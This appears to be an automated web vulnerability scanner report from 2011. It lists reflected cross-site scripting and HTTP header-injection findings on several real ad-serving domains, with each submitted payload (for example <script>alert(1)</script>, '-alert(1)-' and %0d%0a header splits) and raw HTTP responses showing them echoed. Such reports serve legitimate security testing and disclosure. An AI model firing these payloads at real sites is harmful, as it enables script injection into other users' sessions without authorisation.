GET /link/tplimage?lid=41000000027557560&pubid=391ec%0d%0a7c35b386e75 HTTP/1.1 Host: clickserve.cc-dt.com Proxy-Connection: keep-alive Referer: http://www30a2.glam.com/gad/glamadapt_srv.act?;ga_output=html;ga_exadvids=50000417,50001916,2457154;ga_exadids=5000019254;_ge_=6^2^8e20d085342adacae9cc80362f9e8842;ga_adb=ade;sid=116391130334874196611;browser=2;co=US;dma=511;;;;flg=72;;zone=/;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;pec=f;vec=st;vpec=st;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2696;qc=2693;qc=2692;qc=2690;qc=1988;qc=1902;atf=u;pfl=0;dt=s;!c=hagl;!c=hagn;art=232152_f8f;pt=0;afid=356541251;dsid=695190;;tt=i;u=b023179zhfv1qn3jidi,f0fu2sa,g100020;sz=728x90;tile=1;ord=7226277049630880;;afid=356541251;dsid=695190;url=s0a4ra;seq=1;ux=f-fu2sa,tid-1,pid-79zhfv1qn3jidi,aid-3,i-1,g-72,1,;_glt=300:1:13:4:30:761:2011:5:2;a_tz=-300;_g_cv=2;;;dsid=695190;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;ia=mf;pec=f;rmt=exp;vec=st;vpec=st;;dt=s;!c=hagl;!c=hagn;;lbt=nbt;sbt=bc;sbt=fa;sbt=b;sbt=ec;sbt=lf;sbt=lh;sbt=lhe;sbt=f;sbt=s;sbt=fc;sbt=fp;sbt=bcb;sbt=bcf;sbt=bh; User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 13:29:08 GMT Server: Apache/1.3.41 (Unix) Location: http://gan.doubleclick.net/gan_impression?lid=41000000027557560&pubid=391ec 7c35b386e75 Cneonction: close Content-Type: text/html; charset=iso-8859-1 Expires: Mon, 02 May 2011 13:29:08 GMT Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://gan.doubleclick.net/gan_impression?lid=4100 ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 1594f%0d%0ad8816df24f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://media.fastclick.net/1594f d8816df24f9/g ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 9f542%0d%0a08d857cb4c0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://media.fastclick.net/w/9f542 08d857cb4c0 ...[SNIP]...
The value of the S cookie is copied into the Set-Cookie response header. The payload 5cdd4%0d%0af376d10c369 was submitted in the S cookie. This caused a response containing an injected HTTP header.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://media.fastclick.net/w/get.media?sid=5396 ...[SNIP]...
The value of the gname request parameter is copied into the Set-Cookie response header. The payload 4d3ab%0d%0a9f9bde70083 was submitted in the gname parameter. This caused a response containing an injected HTTP header.
The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload fa2f0<script>alert(1)</script>b1f522a3374 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 192cc<script>alert(1)</script>0d7dd038fa4 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
6.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://480-adver-view.c3metrics.com
Path:
/c3VTabstrct-6-2.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e7a33<script>alert(1)</script>26cb5890d6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 2133b<script>alert(1)</script>1241548eef4 was submitted in the rv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the t request parameter is copied into the HTML document as plain text between tags. The payload f7222<script>alert(1)</script>307d61967c was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload d9e6d<script>alert(1)</script>e50c464bbef was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 923f8<script>alert(1)</script>0bafb8900a2 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 02 May 2011 12:49:50 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Content-Length: 1049 Connection: close Content-Type: text/html Set-Cookie: SERVERID=s1; path=/ Cache-control: private
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload fe0cf<script>alert(1)</script>58e0387d345 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 02 May 2011 12:49:49 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Content-Length: 1049 Connection: close Content-Type: text/html Set-Cookie: SERVERID=s7; path=/ Cache-control: private
The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 65d60<script>alert(1)</script>95aa5c7e076 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 02 May 2011 12:49:53 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Content-Length: 1049 Connection: close Content-Type: text/html Set-Cookie: SERVERID=s1; path=/ Cache-control: private
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c745b'-alert(1)-'4ace195dc06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 528 Date: Mon, 02 May 2011 14:58:50 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:58:50 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5855b'-alert(1)-'ab23faff340 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 528 Date: Mon, 02 May 2011 14:59:18 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:59:18 GMT
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4910a'-alert(1)-'28bda3ed599 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 528 Vary: Accept-Encoding Date: Mon, 02 May 2011 14:59:33 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:59:33 GMT
The value of the anx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d284'-alert(1)-'03c000bc2e was submitted in the anx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 528 Date: Mon, 02 May 2011 14:57:45 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:57:45 GMT
6.14. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/6a.orbitcast/tech.general.ros/other
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b379'-alert(1)-'7cb02ce77db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 532 Vary: Accept-Encoding Date: Mon, 02 May 2011 14:58:17 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:58:17 GMT
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bbb5'-alert(1)-'5fcdaad9d48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 437 Vary: Accept-Encoding Date: Mon, 02 May 2011 12:50:48 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 12:50:48 GMT
6.16. http://a.collective-media.net/adj/cm.guardian/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/cm.guardian/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2bbd'-alert(1)-'1d315ad8d9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 441 Vary: Accept-Encoding Date: Mon, 02 May 2011 12:50:46 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 12:50:46 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fe83'-alert(1)-'af780e57a1c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 438 Vary: Accept-Encoding Date: Mon, 02 May 2011 12:50:44 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 12:50:44 GMT
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f26dd'-alert(1)-'74c9b80dd6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Mon, 02 May 2011 14:59:34 GMT Connection: close Content-Length: 7428
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-57634638_1304348374","http://ad.doubleclick.net/adjf26dd'-alert(1)-'74c9b80dd6b/6a.orbitcast/tech.general.ros/other;net=6a;u=,6a-57634638_1304348374,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee8db'-alert(1)-'c950acb7221 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Mon, 02 May 2011 15:00:00 GMT Connection: close Content-Length: 7428
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-13048608_1304348400","http://ad.doubleclick.net/adj/6a.orbitcastee8db'-alert(1)-'c950acb7221/tech.general.ros/other;net=6a;u=,6a-13048608_1304348400,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw=owl;sz=728x9 ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f71a'-alert(1)-'368975efe8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Mon, 02 May 2011 15:00:22 GMT Connection: close Content-Length: 7428
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-99110641_1304348422","http://ad.doubleclick.net/adj/6a.orbitcast/tech.general.ros8f71a'-alert(1)-'368975efe8c/other;net=6a;u=,6a-99110641_1304348422,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw=owl;sz=728x90;net=6a;ord1=738 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d15cc'-alert(1)-'5d32a32f2c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Mon, 02 May 2011 15:00:55 GMT Connection: close Content-Length: 7428
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-85532793_1304348455","http://ad.doubleclick.net/adj/6a.orbitcast/tech.general.ros/otherd15cc'-alert(1)-'5d32a32f2c1;net=6a;u=,6a-85532793_1304348455,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw=owl;sz=728x90;net=6a;ord1=7385;cont ...[SNIP]...
The value of the anx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3350f'-alert(1)-'0a71c06d7f7 was submitted in the anx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Mon, 02 May 2011 14:57:46 GMT Connection: close Content-Length: 7290
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... AndAttachAd("6a-76473120_1304348266","http://ad.doubleclick.net/adj/6a.orbitcast/tech.general.ros/other;net=6a;u=,6a-76473120_1304348266,11f8f328940989e,none,dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=3350f'-alert(1)-'0a71c06d7f7;contx=none;dc=w;btg=dx.16;btg=dx.23;btg=dx.17;btg=cm.ent_m;btg=cm.music_h?","0","0",false);</scr'+'ipt> ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 115fb"-alert(1)-"85e938b1609 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:52:09 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... MW_X3_300x125_14Mar2011.gif"; var minV = 9; var FWH = ' width="300" height="125" '; var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329115fb"-alert(1)-"85e938b1609&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/1 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0a77'-alert(1)-'22b0344f2f7 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:52:14 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329d0a77'-alert(1)-'22b0344f2f7&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/1 ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e57e6"-alert(1)-"48b41a44627 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:53:20 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... nV = 9; var FWH = ' width="300" height="125" '; var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340e57e6"-alert(1)-"48b41a44627&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs% ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d0ff'-alert(1)-'a90a5132410 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:53:25 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=20170023401d0ff'-alert(1)-'a90a5132410&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs% ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd50e"-alert(1)-"43a7c3abbc6 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:53:40 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... ; var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3fd50e"-alert(1)-"43a7c3abbc6&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/ ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec1d5'-alert(1)-'7f740edecfd was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:53:45 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... get=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3ec1d5'-alert(1)-'7f740edecfd&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/ ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a34ae'-alert(1)-'a50ba774864 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:53:34 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEENa34ae'-alert(1)-'a50ba774864&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp: ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62d24"-alert(1)-"6480d73bfc4 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:53:29 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... var FWH = ' width="300" height="125" '; var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN62d24"-alert(1)-"6480d73bfc4&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp: ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e918"-alert(1)-"98486586506 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:53:10 GMT Content-Length: 6343
